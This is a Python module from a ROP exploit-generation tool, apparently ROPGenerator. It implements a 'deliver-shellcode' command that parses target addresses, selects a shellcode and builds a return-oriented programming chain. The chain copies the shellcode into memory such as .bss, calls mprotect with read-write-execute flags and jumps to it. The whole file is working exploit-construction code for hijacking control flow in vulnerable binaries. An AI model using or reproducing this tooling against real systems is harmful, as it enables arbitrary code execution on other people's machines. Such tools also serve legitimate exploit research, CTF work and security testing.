# -*- coding:utf-8 -*-  
# DeliverShellcode module: exploit type: copy shellcode into memory then execute it

from ropgenerator.IO import string_bold, string_special, banner, error, notify, info, verbose
from ropgenerator.Constraints import Constraint, Assertion, BadBytes, Chainable
from ropgenerator.exploit.HighLevelUtils import STRtoMEM
from ropgenerator.exploit.syscalls.SyscallDef import build_syscall_Linux
from ropgenerator.exploit.Scanner import getSectionAddress
from ropgenerator.exploit.Shellcode import select_shellcode
from ropgenerator.semantic.Engine import search
from ropgenerator.Database import QueryType
from ropgenerator.semantic.ROPChains import PwnChain
import ropgenerator.Architecture as Arch 
import ropgenerator.exploit.syscalls.Linux32 as Linux32
import ropgenerator.exploit.syscalls.Linux64 as Linux64

################################
#  DELIVER-SHELLCODE COMMAND   # 
################################

# Options accepted by dshell(), each in a long and a short form.
# Single address where the shellcode must be delivered.
# NOTE(review): the help text below documents the value as <int>, but dshell()
# also accepts hexadecimal input (decimal is tried first, then base 16).
OPTION_ADDRESS = '--address'
OPTION_ADDRESS_SHORT = "-a"

# Memory range "<addr>,<addr>" inside which the shellcode may be delivered.
# dshell() rejects combining it with the address option.
OPTION_RANGE = "--address-range" 
OPTION_RANGE_SHORT = "-r" 

# Print the command help (dshell() then returns "help").
OPTION_HELP = '--help'
OPTION_HELP_SHORT = '-h'


# Help text of the 'deliver-shellcode' command, printed by print_help().
# It is assembled in four parts: banner, description, options list, examples.
CMD_DSHELL_HELP =  banner([string_bold("'deliver-shellcode' command"),\
                    string_special("(Deliver a shellcode & Execute it)")])
CMD_DSHELL_HELP += "\n\n\t"+string_bold("Description:")+\
"\n\t\tThis method tries to create an executable memory area"+\
"\n\t\t, then copy a given shellcode into this area, and then"+\
"\n\t\t jump to execute this shellcode"

# Options section: one entry per option, long and short names highlighted
CMD_DSHELL_HELP += "\n\n\t"+string_bold("Options")+":"
CMD_DSHELL_HELP += "\n\n\t\t"+string_special(OPTION_ADDRESS_SHORT)+","+string_special(OPTION_ADDRESS)+" <int>\t Address where to deliver shellcode"
CMD_DSHELL_HELP += "\n\n\t\t"+string_special(OPTION_RANGE_SHORT)+","+string_special(OPTION_RANGE)+" \t Memory space that can be used to\n\t\t\t<addr>,<addr>\t deliver the shellcode"

# Usage examples
CMD_DSHELL_HELP += "\n\n\t"+string_bold("Examples")+": "+\
    "\n\t\tpwn deliver-shellcode --address 0x084cd560"+\
    "\n\t\tpwn deliver-shellcode --address-range 0x6c4000,0x6c6000"
    
def print_help():
    """Show the usage text of the 'deliver-shellcode' command on stdout."""
    help_text = CMD_DSHELL_HELP
    print(help_text)
    


def _parse_address(text):
    """
    Convert a user-supplied address string to an int.

    The string is read as decimal first, then as hexadecimal (base 16 also
    accepts an optional '0x' prefix). Returns None if neither works.
    """
    for base in (10, 16):
        try:
            return int(text, base)
        except ValueError:
            pass
    return None


def dshell(args, constraint, assertion, lmax):
    """
    Entry point of the 'deliver-shellcode' command.

    Parses *args* (the tokens following the command name), asks the user to
    select a shellcode, then builds the exploit with build_dshell().

    Accepted options:
      -a/--address <addr>            deliver the shellcode at <addr>
      -r/--address-range <lo>,<hi>   deliver the shellcode within [lo, hi]
      -h/--help                      print the command help
    Addresses are read as decimal first, then as hexadecimal, and must not
    be negative. The address and range options are mutually exclusive.

    constraint, assertion, lmax are forwarded unchanged to build_dshell().

    Returns "help" when the help option is given, None on a parsing error or
    when no shellcode is selected, otherwise the result of build_dshell().
    """
    address = None
    limit = None
    seenAddress = False
    seenRange = False

    # Parse options
    i = 0
    while i < len(args):
        option = args[i]
        # startswith() rather than option[0]: an empty token is reported as
        # an invalid option instead of raising IndexError
        if( not option.startswith('-') ):
            error("Error. Invalid option '{}'".format(option))
            return None

        if( option in [OPTION_ADDRESS_SHORT, OPTION_ADDRESS] ):
            if( seenAddress ):
                error("Error. '" + option + "' option should be used only once")
                return None
            elif( seenRange ):
                error("Error. You can't specify a delivery address and range at the same time")
                return None
            if( i+1 >= len(args) ):
                error("Error. Missing address after option '"+option+"'")
                return None
            address = _parse_address(args[i+1])
            if( address is None ):
                error("Error. '" + args[i+1] +"' isn't a valid address")
                return None
            # Same validation as for the bounds of an address range
            if( address < 0 ):
                error("Error. Addresses can't be negative")
                return None
            seenAddress = True
            i += 2
        elif( option in [OPTION_HELP, OPTION_HELP_SHORT] ):
            print_help()
            return "help"
        elif( option in [OPTION_RANGE, OPTION_RANGE_SHORT] ):
            if( seenRange ):
                error("Error. '" + option + "' option should be used only once")
                return None
            elif( seenAddress ):
                error("Error. You can't specify a delivery address and range at the same time")
                return None
            if( i+1 >= len(args) ):
                error("Error. Missing address range after option '"+option+"'")
                return None
            values = args[i+1].split(',')
            if( len(values) < 2 ):
                error("Error. Invalid address range")
                return None
            elif( len(values) > 2 ):
                error("Error. Too many values after '{}' option".format(option))
                return None
            # Convert both bounds into ints
            int_values = []
            for value in values:
                parsed = _parse_address(value)
                if( parsed is None ):
                    error("Error. '" + value +"' isn't a valid address")
                    return None
                if( parsed < 0 ):
                    error("Error. Addresses can't be negative")
                    return None
                int_values.append(parsed)
            (low, high) = int_values
            # Check consistency
            if( low > high ):
                error("Error. Invalid address range: lower address should be inferior to upper address")
                return None
            (address, limit) = (low, high)
            seenRange = True
            i += 2
        else:
            error("Error. Unknown option '{}'".format(option))
            return None

    # Select shellcode to deliver
    (shellcode, _shellcode_info) = select_shellcode(Arch.currentArch.name)
    if( not shellcode ):
        return None
    shellcode = str(shellcode)

    # Build the exploit
    print("")
    info("Building exploit: deliver-shellcode strategy\n\n")
    return build_dshell(shellcode, constraint, assertion, address, limit, lmax)
    

def build_dshell(shellcode, constraint, assertion, address, limit, lmax, optimizeLen=False ):
    """
    Build a 'deliver-shellcode' exploit chain.

    The returned chain calls mprotect() on the page(s) holding the shellcode
    (flag 7, presumably PROT_READ|PROT_WRITE|PROT_EXEC), copies *shellcode*
    into memory, then jumps to it.

    shellcode   -- the shellcode to deliver; its len() sizes the mprotect area
    constraint  -- Constraint used for every sub-chain search
    assertion   -- Assertion used for every sub-chain search
    address     -- delivery address; when falsy, the .bss section address is used
    limit       -- upper bound of the memory area usable for delivery; when
                   falsy, defaults to address + Arch.minPageSize()
    lmax        -- maximum length of the whole chain (lmax*Arch.octets() is
                   what gets reported to the user as available bytes)
    optimizeLen -- forwarded to the underlying chain searches

    Returns a PwnChain() instance, or None if any step fails.
    """
    # Find the delivery address
    if( not address ):
        # No address given: fall back to the .bss section
        notify("Getting delivery address for shellcode")
        address = getSectionAddress('.bss')
        addr_str = ".bss"
        if( not address ):
            verbose("Couldn't find .bss address")
            # Documented contract is PwnChain or None (this used to return [])
            return None
    else:
        addr_str = hex(address)

    if( not limit ):
        limit = address + Arch.minPageSize()

    # Deliver shellcode
    notify("Building chain to copy shellcode in memory")
    verbose("{}/{} bytes available".format(lmax*Arch.octets(), lmax*Arch.octets()))
    (shellcode_address, STRtoMEM_chain) = STRtoMEM(shellcode, address, constraint, assertion, limit=limit, lmax=lmax, addr_str=addr_str, hex_info=True, optimizeLen=optimizeLen)
    # Check for failure BEFORE using shellcode_address: when the copy fails
    # it is not guaranteed to be an int, and hex() would raise TypeError
    if( not STRtoMEM_chain ):
        verbose("Could not copy shellcode into memory")
        return None
    address = shellcode_address
    addr_str = hex(address)

    # Building mprotect
    notify("Building mprotect() chain")
    # mprotect() needs a page-aligned start address: round the shellcode
    # address down to its page boundary and grow the length by the same amount
    over_page_size = address % Arch.minPageSize()
    page_address = address - over_page_size
    length = len(shellcode)+1+over_page_size
    flag = 7
    lmax2 = lmax-len(STRtoMEM_chain)
    verbose("{}/{} bytes available".format(lmax2*Arch.octets(), lmax*Arch.octets()))
    if( lmax2 <= 0 ):
        return None

    # Select the Linux syscall table matching the current architecture
    if( Arch.currentArch == Arch.ArchX86 ):
        (syscalls, bits) = (Linux32, 32)
    elif( Arch.currentArch == Arch.ArchX64 ):
        (syscalls, bits) = (Linux64, 64)
    else:
        verbose("mprotect call not supported for architecture {}".format(Arch.currentArch.name))
        return None
    if( not syscalls.supported('mprotect') ):
        verbose("mprotect syscall not supported for architecture {}".format(Arch.currentArch.name))
        return None
    mprotect_chain = build_syscall_Linux(syscalls.getSyscall("mprotect"), [page_address, length, flag], bits,
                                         constraint.add(Chainable(ret=True)), assertion, clmax=lmax2-2, optimizeLen=optimizeLen)
    if( not mprotect_chain ):
        return None
    verbose("Done")

    # Jump to shellcode: load its address into Arch.ipNum()
    # (presumably the instruction-pointer register)
    notify("Searching chain to jump to shellcode")
    lmax3 = lmax2-len(mprotect_chain)
    verbose("{}/{} bytes available".format(lmax3*Arch.octets(), lmax*Arch.octets()))
    jmp_shellcode_chains = search(QueryType.CSTtoREG, Arch.ipNum(), address, constraint, assertion, clmax=lmax3, optimizeLen=optimizeLen)
    if( not jmp_shellcode_chains ):
        verbose("Couldn't find a jump to the shellcode")
        return None
    verbose("Done")
    notify("Done")

    # Build PwnChain res and return
    res = PwnChain()
    res.add(mprotect_chain, "Call mprotect({},{},{})".format(hex(page_address), length, flag))
    res.add(STRtoMEM_chain, "Copy shellcode to {}".format(addr_str))
    res.add(jmp_shellcode_chains[0], "Jump to shellcode (address {})".format(addr_str))
    return res
